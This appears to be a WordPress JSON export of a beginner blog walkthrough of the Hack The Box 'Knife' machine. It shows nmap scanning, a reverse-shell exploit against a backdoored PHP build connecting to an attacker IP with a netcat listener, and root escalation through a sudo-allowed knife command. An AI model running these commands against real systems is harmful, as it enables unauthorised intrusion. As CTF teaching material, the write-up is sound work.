{"id":163,"date":"2022-07-27T23:15:36","date_gmt":"2022-07-27T23:15:36","guid":{"rendered":"https:\/\/hacking.cool\/?p=163"},"modified":"2024-03-18T05:11:22","modified_gmt":"2024-03-18T05:11:22","slug":"htb-knife-walkthrough","status":"publish","type":"post","link":"https:\/\/hacking.cool\/atomanya\/htb-knife-walkthrough\/","title":{"rendered":"HTB Knife walkthrough"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large is-resized\"><img decoding=\"async\" src=\"http:\/\/hacking.cool\/wp-content\/uploads\/2022\/07\/Knife-1024x775.png\" alt=\"\" class=\"wp-image-164\" style=\"width:512px;height:388px\"\/><\/figure>\n\n\n\n<p class=\"has-black-color has-text-color\">It&#8217;s one of the easiest machines on Hack The Box which is good for beginners. Therefore I will try to explain my every step thoroughly.<\/p>\n\n\n\n<p class=\"has-black-color has-text-color\">We will start from port scanning with nmap:<\/p>\n\n\n\n<p class=\"has-vivid-red-color has-text-color\"><strong>nmap -A 10.10.10.242 -Pn <\/strong><\/p>\n\n\n\n<p class=\"has-black-color has-text-color\">(We use -A flag for OS detection, version detection, script scanning, traceroute and -Pn for not pinging the host.)<\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"855\" height=\"355\" src=\"https:\/\/hacking.cool\/atomanya\/wp-content\/uploads\/2022\/07\/image.png\" alt=\"\" class=\"wp-image-165\" style=\"width:855px;height:355px\" srcset=\"https:\/\/hacking.cool\/atomanya\/wp-content\/uploads\/2022\/07\/image.png 855w, https:\/\/hacking.cool\/atomanya\/wp-content\/uploads\/2022\/07\/image-600x249.png 600w, https:\/\/hacking.cool\/atomanya\/wp-content\/uploads\/2022\/07\/image-300x125.png 300w, https:\/\/hacking.cool\/atomanya\/wp-content\/uploads\/2022\/07\/image-768x319.png 768w\" sizes=\"auto, (max-width: 855px) 100vw, 855px\" \/><\/figure>\n\n\n\n<p class=\"has-black-color has-text-color\">Only two ports seem to be open. Let&#8217;s check the web site which is running on 80 port!<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"478\" src=\"https:\/\/hacking.cool\/atomanya\/wp-content\/uploads\/2022\/07\/image-1-1024x478.png\" alt=\"\" class=\"wp-image-168\" srcset=\"https:\/\/hacking.cool\/atomanya\/wp-content\/uploads\/2022\/07\/image-1-1024x478.png 1024w, https:\/\/hacking.cool\/atomanya\/wp-content\/uploads\/2022\/07\/image-1-600x280.png 600w, https:\/\/hacking.cool\/atomanya\/wp-content\/uploads\/2022\/07\/image-1-300x140.png 300w, https:\/\/hacking.cool\/atomanya\/wp-content\/uploads\/2022\/07\/image-1-768x359.png 768w, https:\/\/hacking.cool\/atomanya\/wp-content\/uploads\/2022\/07\/image-1.png 1516w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p class=\"has-black-color has-text-color\">But i wasn&#8217;t able to find something interesting here, nothing in page source and no interesting links as well. Also directory enumeration with gobuster had no result \ud83d\ude41 So you can skip this step.<\/p>\n\n\n\n<p class=\"has-black-color has-text-color\">Now time to check the site with curl:<\/p>\n\n\n\n<p class=\"has-vivid-red-color has-text-color\"><strong>curl -I 10.10.10.242<\/strong><\/p>\n\n\n\n<p class=\"has-black-color has-text-color\">(we use -I option to print the title without the body)<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"808\" height=\"144\" src=\"https:\/\/hacking.cool\/atomanya\/wp-content\/uploads\/2022\/07\/image-3.png\" alt=\"\" class=\"wp-image-174\" srcset=\"https:\/\/hacking.cool\/atomanya\/wp-content\/uploads\/2022\/07\/image-3.png 808w, https:\/\/hacking.cool\/atomanya\/wp-content\/uploads\/2022\/07\/image-3-600x107.png 600w, https:\/\/hacking.cool\/atomanya\/wp-content\/uploads\/2022\/07\/image-3-300x53.png 300w, https:\/\/hacking.cool\/atomanya\/wp-content\/uploads\/2022\/07\/image-3-768x137.png 768w\" sizes=\"auto, (max-width: 808px) 100vw, 808px\" \/><\/figure>\n\n\n\n<p class=\"has-black-color has-text-color\">And what we see! Very strange version of php here&#8230;Let&#8217;s google that.<\/p>\n\n\n\n<p class=\"has-black-color has-text-color\">We can find out that it is a version of php with a backdoor and use an exploit. I took the following one from github:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"433\" src=\"https:\/\/hacking.cool\/atomanya\/wp-content\/uploads\/2022\/07\/image-6-1024x433.png\" alt=\"\" class=\"wp-image-189\" srcset=\"https:\/\/hacking.cool\/atomanya\/wp-content\/uploads\/2022\/07\/image-6-1024x433.png 1024w, https:\/\/hacking.cool\/atomanya\/wp-content\/uploads\/2022\/07\/image-6-600x254.png 600w, https:\/\/hacking.cool\/atomanya\/wp-content\/uploads\/2022\/07\/image-6-300x127.png 300w, https:\/\/hacking.cool\/atomanya\/wp-content\/uploads\/2022\/07\/image-6-768x325.png 768w, https:\/\/hacking.cool\/atomanya\/wp-content\/uploads\/2022\/07\/image-6-1536x650.png 1536w, https:\/\/hacking.cool\/atomanya\/wp-content\/uploads\/2022\/07\/image-6.png 1607w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p class=\"has-vivid-red-color has-text-color\"><a href=\"https:\/\/github.com\/flast101\/php-8.1.0-dev-backdoor-rce\/blob\/main\/revshell_php_8.1.0-dev.py\">https:\/\/github.com\/flast101\/php-8.1.0-dev-backdoor-rce\/blob\/main\/revshell_php_8.1.0-dev.py<\/a><\/p>\n\n\n\n<p class=\"has-black-color has-text-color\">So we need to grab a code from this link and put it to the file that we create (I called it shell.py):<\/p>\n\n\n\n<p class=\"has-vivid-red-color has-text-color\"><strong>nano shell.py <\/strong><\/p>\n\n\n\n<p class=\"has-black-color has-text-color\">(I prefer nano, but you can use vi or vim, etc.)<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"423\" src=\"https:\/\/hacking.cool\/atomanya\/wp-content\/uploads\/2022\/07\/image-7-1024x423.png\" alt=\"\" class=\"wp-image-194\" srcset=\"https:\/\/hacking.cool\/atomanya\/wp-content\/uploads\/2022\/07\/image-7-1024x423.png 1024w, https:\/\/hacking.cool\/atomanya\/wp-content\/uploads\/2022\/07\/image-7-600x248.png 600w, https:\/\/hacking.cool\/atomanya\/wp-content\/uploads\/2022\/07\/image-7-300x124.png 300w, https:\/\/hacking.cool\/atomanya\/wp-content\/uploads\/2022\/07\/image-7-768x317.png 768w, https:\/\/hacking.cool\/atomanya\/wp-content\/uploads\/2022\/07\/image-7.png 1367w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p class=\"has-black-color has-text-color\">Then set our listener on 443 port (or you can use different one):<\/p>\n\n\n\n<p class=\"has-vivid-red-color has-text-color\"><strong>nc -lnvp 443<\/strong><\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"365\" height=\"101\" src=\"https:\/\/hacking.cool\/atomanya\/wp-content\/uploads\/2022\/07\/image-8.png\" alt=\"\" class=\"wp-image-197\" srcset=\"https:\/\/hacking.cool\/atomanya\/wp-content\/uploads\/2022\/07\/image-8.png 365w, https:\/\/hacking.cool\/atomanya\/wp-content\/uploads\/2022\/07\/image-8-300x83.png 300w\" sizes=\"auto, (max-width: 365px) 100vw, 365px\" \/><\/figure>\n\n\n\n<p>And run our script. Usage: python3 revshell_php_8.1.0-dev.py &lt;target-ip&gt; &lt;attacker-ip&gt; &lt;attacker-port&gt;<\/p>\n\n\n\n<p class=\"has-vivid-red-color has-text-color\"><strong>python3 shell.py http:\/\/10.10.10.242 10.10.14.16 443<\/strong><\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"474\" height=\"78\" src=\"https:\/\/hacking.cool\/atomanya\/wp-content\/uploads\/2022\/07\/image-9.png\" alt=\"\" class=\"wp-image-206\" srcset=\"https:\/\/hacking.cool\/atomanya\/wp-content\/uploads\/2022\/07\/image-9.png 474w, https:\/\/hacking.cool\/atomanya\/wp-content\/uploads\/2022\/07\/image-9-300x49.png 300w\" sizes=\"auto, (max-width: 474px) 100vw, 474px\" \/><\/figure>\n\n\n\n<p class=\"has-black-color has-text-color\">And&#8230; we got a shell \ud83d\ude42<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"641\" height=\"200\" src=\"https:\/\/hacking.cool\/atomanya\/wp-content\/uploads\/2022\/07\/image-10.png\" alt=\"\" class=\"wp-image-208\" srcset=\"https:\/\/hacking.cool\/atomanya\/wp-content\/uploads\/2022\/07\/image-10.png 641w, https:\/\/hacking.cool\/atomanya\/wp-content\/uploads\/2022\/07\/image-10-600x187.png 600w, https:\/\/hacking.cool\/atomanya\/wp-content\/uploads\/2022\/07\/image-10-300x94.png 300w\" sizes=\"auto, (max-width: 641px) 100vw, 641px\" \/><\/figure>\n\n\n\n<p class=\"has-black-color has-text-color\">Flag is waiting for us in user&#8217;s home directory:<\/p>\n\n\n\n<p class=\"has-vivid-red-color has-text-color\"><strong> cat \/home\/james\/user.txt<\/strong><\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"329\" height=\"60\" src=\"https:\/\/hacking.cool\/atomanya\/wp-content\/uploads\/2022\/07\/image-12.png\" alt=\"\" class=\"wp-image-211\" srcset=\"https:\/\/hacking.cool\/atomanya\/wp-content\/uploads\/2022\/07\/image-12.png 329w, https:\/\/hacking.cool\/atomanya\/wp-content\/uploads\/2022\/07\/image-12-300x55.png 300w\" sizes=\"auto, (max-width: 329px) 100vw, 329px\" \/><\/figure>\n\n\n\n<p class=\"has-black-color has-text-color\">Next we need to find a way how to get root. Try to check which programs our user james can run with root privileges:<\/p>\n\n\n\n<p class=\"has-vivid-red-color has-text-color\"><strong>sudo -l<\/strong><\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"770\" height=\"168\" src=\"https:\/\/hacking.cool\/atomanya\/wp-content\/uploads\/2022\/07\/image-13.png\" alt=\"\" class=\"wp-image-212\" srcset=\"https:\/\/hacking.cool\/atomanya\/wp-content\/uploads\/2022\/07\/image-13.png 770w, https:\/\/hacking.cool\/atomanya\/wp-content\/uploads\/2022\/07\/image-13-600x131.png 600w, https:\/\/hacking.cool\/atomanya\/wp-content\/uploads\/2022\/07\/image-13-300x65.png 300w, https:\/\/hacking.cool\/atomanya\/wp-content\/uploads\/2022\/07\/image-13-768x168.png 768w\" sizes=\"auto, (max-width: 770px) 100vw, 770px\" \/><\/figure>\n\n\n\n<p class=\"has-black-color has-text-color\">And he can run knife! Now moving to the GTFOBins and checking for Knife. And it&#8217;s exists here:<\/p>\n\n\n\n<p><a href=\"https:\/\/gtfobins.github.io\/gtfobins\/knife\/\">https:\/\/gtfobins.github.io\/gtfobins\/knife\/<\/a><\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"496\" src=\"https:\/\/hacking.cool\/atomanya\/wp-content\/uploads\/2022\/07\/image-14-1024x496.png\" alt=\"\" class=\"wp-image-217\" srcset=\"https:\/\/hacking.cool\/atomanya\/wp-content\/uploads\/2022\/07\/image-14-1024x496.png 1024w, https:\/\/hacking.cool\/atomanya\/wp-content\/uploads\/2022\/07\/image-14-600x291.png 600w, https:\/\/hacking.cool\/atomanya\/wp-content\/uploads\/2022\/07\/image-14-300x145.png 300w, https:\/\/hacking.cool\/atomanya\/wp-content\/uploads\/2022\/07\/image-14-768x372.png 768w, https:\/\/hacking.cool\/atomanya\/wp-content\/uploads\/2022\/07\/image-14.png 1250w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p class=\"has-black-color has-text-color\">Let&#8217;s copy the command and run it:<\/p>\n\n\n\n<p class=\"has-vivid-red-color has-text-color\"><strong>sudo knife exec -E &#8216;exec &#8220;\/bin\/sh&#8221;&#8216;<\/strong><\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"416\" height=\"77\" src=\"https:\/\/hacking.cool\/atomanya\/wp-content\/uploads\/2022\/07\/image-15.png\" alt=\"\" class=\"wp-image-218\" srcset=\"https:\/\/hacking.cool\/atomanya\/wp-content\/uploads\/2022\/07\/image-15.png 416w, https:\/\/hacking.cool\/atomanya\/wp-content\/uploads\/2022\/07\/image-15-300x56.png 300w\" sizes=\"auto, (max-width: 416px) 100vw, 416px\" \/><\/figure>\n\n\n\n<p class=\"has-black-color has-text-color\">Very nice, we have root \ud83d\ude09<\/p>\n\n\n\n<p class=\"has-black-color has-text-color\">Flag in root directory:<\/p>\n\n\n\n<p class=\"has-vivid-red-color has-text-color\"><strong>cat \/root\/root.txt<\/strong><\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"277\" height=\"47\" src=\"https:\/\/hacking.cool\/atomanya\/wp-content\/uploads\/2022\/07\/image-16.png\" alt=\"\" class=\"wp-image-220\"\/><\/figure>\n\n\n\n<p class=\"has-black-color has-text-color\">Thanks for your attention. If you still have any questions write a comment below. <\/p>\n","protected":false},"excerpt":{"rendered":"<p>It&#8217;s one of the easiest machines on Hack The Box which is good for beginners. Therefore I will try to explain my every step thoroughly. We will start from port scanning with nmap: nmap -A 10.10.10.242 -Pn (We use -A flag for OS detection, version detection, script scanning, traceroute and -Pn for not pinging the<span class=\"post-excerpt-end\">&hellip;<\/span><\/p>\n<p class=\"more-link\"><a href=\"https:\/\/hacking.cool\/atomanya\/htb-knife-walkthrough\/\" class=\"themebutton\">Read More<\/a><\/p>\n","protected":false},"author":2,"featured_media":855,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_mi_skip_tracking":false,"footnotes":""},"categories":[3],"tags":[],"class_list":["post-163","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-walktroughs"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v19.3 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>HTB Knife walkthrough - hacking.cool<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/hacking.cool\/atomanya\/htb-knife-walkthrough\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"HTB Knife walkthrough - hacking.cool\" \/>\n<meta property=\"og:description\" content=\"It&#8217;s one of the easiest machines on Hack The Box which is good for beginners. Therefore I will try to explain my every step thoroughly. We will start from port scanning with nmap: nmap -A 10.10.10.242 -Pn (We use -A flag for OS detection, version detection, script scanning, traceroute and -Pn for not pinging the&hellip;Read More\" \/>\n<meta property=\"og:url\" content=\"https:\/\/hacking.cool\/atomanya\/htb-knife-walkthrough\/\" \/>\n<meta property=\"og:site_name\" content=\"hacking.cool\" \/>\n<meta property=\"article:published_time\" content=\"2022-07-27T23:15:36+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2024-03-18T05:11:22+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/hacking.cool\/atomanya\/wp-content\/uploads\/2022\/07\/1_njiTGzgqxI8iicqa2Wj74A.jpeg\" \/>\n\t<meta property=\"og:image:width\" content=\"1400\" \/>\n\t<meta property=\"og:image:height\" content=\"787\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Anya\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Anya\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"5 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebSite\",\"@id\":\"https:\/\/hacking.cool\/atomanya\/#website\",\"url\":\"https:\/\/hacking.cool\/atomanya\/\",\"name\":\"hacking.cool\",\"description\":\"is the hacking school \ud83d\udc69\ud83c\udffb\u200d\ud83d\udcbb\ud83e\uddd1\ud83c\udffb\u200d\ud83d\udcbb\ud83d\uddfa\ud83d\udcda\ud83d\udcd6\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/hacking.cool\/atomanya\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"en-US\"},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/hacking.cool\/atomanya\/htb-knife-walkthrough\/#primaryimage\",\"url\":\"https:\/\/hacking.cool\/atomanya\/wp-content\/uploads\/2022\/07\/1_njiTGzgqxI8iicqa2Wj74A.jpeg\",\"contentUrl\":\"https:\/\/hacking.cool\/atomanya\/wp-content\/uploads\/2022\/07\/1_njiTGzgqxI8iicqa2Wj74A.jpeg\",\"width\":1400,\"height\":787},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/hacking.cool\/atomanya\/htb-knife-walkthrough\/\",\"url\":\"https:\/\/hacking.cool\/atomanya\/htb-knife-walkthrough\/\",\"name\":\"HTB Knife walkthrough - hacking.cool\",\"isPartOf\":{\"@id\":\"https:\/\/hacking.cool\/atomanya\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/hacking.cool\/atomanya\/htb-knife-walkthrough\/#primaryimage\"},\"datePublished\":\"2022-07-27T23:15:36+00:00\",\"dateModified\":\"2024-03-18T05:11:22+00:00\",\"author\":{\"@id\":\"https:\/\/hacking.cool\/atomanya\/#\/schema\/person\/1c3060c2c9f3493114afde50f9b22bc6\"},\"breadcrumb\":{\"@id\":\"https:\/\/hacking.cool\/atomanya\/htb-knife-walkthrough\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/hacking.cool\/atomanya\/htb-knife-walkthrough\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/hacking.cool\/atomanya\/htb-knife-walkthrough\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/hacking.cool\/atomanya\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"HTB Knife walkthrough\"}]},{\"@type\":\"Person\",\"@id\":\"https:\/\/hacking.cool\/atomanya\/#\/schema\/person\/1c3060c2c9f3493114afde50f9b22bc6\",\"name\":\"Anya\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/hacking.cool\/atomanya\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/e2e99aa0c5e7264f948b910a22231aa9?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/e2e99aa0c5e7264f948b910a22231aa9?s=96&d=mm&r=g\",\"caption\":\"Anya\"},\"url\":\"https:\/\/hacking.cool\/atomanya\/author\/anya\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"HTB Knife walkthrough - hacking.cool","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/hacking.cool\/atomanya\/htb-knife-walkthrough\/","og_locale":"en_US","og_type":"article","og_title":"HTB Knife walkthrough - hacking.cool","og_description":"It&#8217;s one of the easiest machines on Hack The Box which is good for beginners. Therefore I will try to explain my every step thoroughly. We will start from port scanning with nmap: nmap -A 10.10.10.242 -Pn (We use -A flag for OS detection, version detection, script scanning, traceroute and -Pn for not pinging the&hellip;Read More","og_url":"https:\/\/hacking.cool\/atomanya\/htb-knife-walkthrough\/","og_site_name":"hacking.cool","article_published_time":"2022-07-27T23:15:36+00:00","article_modified_time":"2024-03-18T05:11:22+00:00","og_image":[{"width":1400,"height":787,"url":"https:\/\/hacking.cool\/atomanya\/wp-content\/uploads\/2022\/07\/1_njiTGzgqxI8iicqa2Wj74A.jpeg","type":"image\/jpeg"}],"author":"Anya","twitter_card":"summary_large_image","twitter_misc":{"Written by":"Anya","Est. reading time":"5 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebSite","@id":"https:\/\/hacking.cool\/atomanya\/#website","url":"https:\/\/hacking.cool\/atomanya\/","name":"hacking.cool","description":"is the hacking school \ud83d\udc69\ud83c\udffb\u200d\ud83d\udcbb\ud83e\uddd1\ud83c\udffb\u200d\ud83d\udcbb\ud83d\uddfa\ud83d\udcda\ud83d\udcd6","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/hacking.cool\/atomanya\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"en-US"},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/hacking.cool\/atomanya\/htb-knife-walkthrough\/#primaryimage","url":"https:\/\/hacking.cool\/atomanya\/wp-content\/uploads\/2022\/07\/1_njiTGzgqxI8iicqa2Wj74A.jpeg","contentUrl":"https:\/\/hacking.cool\/atomanya\/wp-content\/uploads\/2022\/07\/1_njiTGzgqxI8iicqa2Wj74A.jpeg","width":1400,"height":787},{"@type":"WebPage","@id":"https:\/\/hacking.cool\/atomanya\/htb-knife-walkthrough\/","url":"https:\/\/hacking.cool\/atomanya\/htb-knife-walkthrough\/","name":"HTB Knife walkthrough - hacking.cool","isPartOf":{"@id":"https:\/\/hacking.cool\/atomanya\/#website"},"primaryImageOfPage":{"@id":"https:\/\/hacking.cool\/atomanya\/htb-knife-walkthrough\/#primaryimage"},"datePublished":"2022-07-27T23:15:36+00:00","dateModified":"2024-03-18T05:11:22+00:00","author":{"@id":"https:\/\/hacking.cool\/atomanya\/#\/schema\/person\/1c3060c2c9f3493114afde50f9b22bc6"},"breadcrumb":{"@id":"https:\/\/hacking.cool\/atomanya\/htb-knife-walkthrough\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/hacking.cool\/atomanya\/htb-knife-walkthrough\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/hacking.cool\/atomanya\/htb-knife-walkthrough\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/hacking.cool\/atomanya\/"},{"@type":"ListItem","position":2,"name":"HTB Knife walkthrough"}]},{"@type":"Person","@id":"https:\/\/hacking.cool\/atomanya\/#\/schema\/person\/1c3060c2c9f3493114afde50f9b22bc6","name":"Anya","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/hacking.cool\/atomanya\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/e2e99aa0c5e7264f948b910a22231aa9?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/e2e99aa0c5e7264f948b910a22231aa9?s=96&d=mm&r=g","caption":"Anya"},"url":"https:\/\/hacking.cool\/atomanya\/author\/anya\/"}]}},"jetpack_featured_media_url":"https:\/\/hacking.cool\/atomanya\/wp-content\/uploads\/2022\/07\/1_njiTGzgqxI8iicqa2Wj74A.jpeg","_links":{"self":[{"href":"https:\/\/hacking.cool\/atomanya\/wp-json\/wp\/v2\/posts\/163","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/hacking.cool\/atomanya\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/hacking.cool\/atomanya\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/hacking.cool\/atomanya\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/hacking.cool\/atomanya\/wp-json\/wp\/v2\/comments?post=163"}],"version-history":[{"count":52,"href":"https:\/\/hacking.cool\/atomanya\/wp-json\/wp\/v2\/posts\/163\/revisions"}],"predecessor-version":[{"id":856,"href":"https:\/\/hacking.cool\/atomanya\/wp-json\/wp\/v2\/posts\/163\/revisions\/856"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/hacking.cool\/atomanya\/wp-json\/wp\/v2\/media\/855"}],"wp:attachment":[{"href":"https:\/\/hacking.cool\/atomanya\/wp-json\/wp\/v2\/media?parent=163"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/hacking.cool\/atomanya\/wp-json\/wp\/v2\/categories?post=163"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/hacking.cool\/atomanya\/wp-json\/wp\/v2\/tags?post=163"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}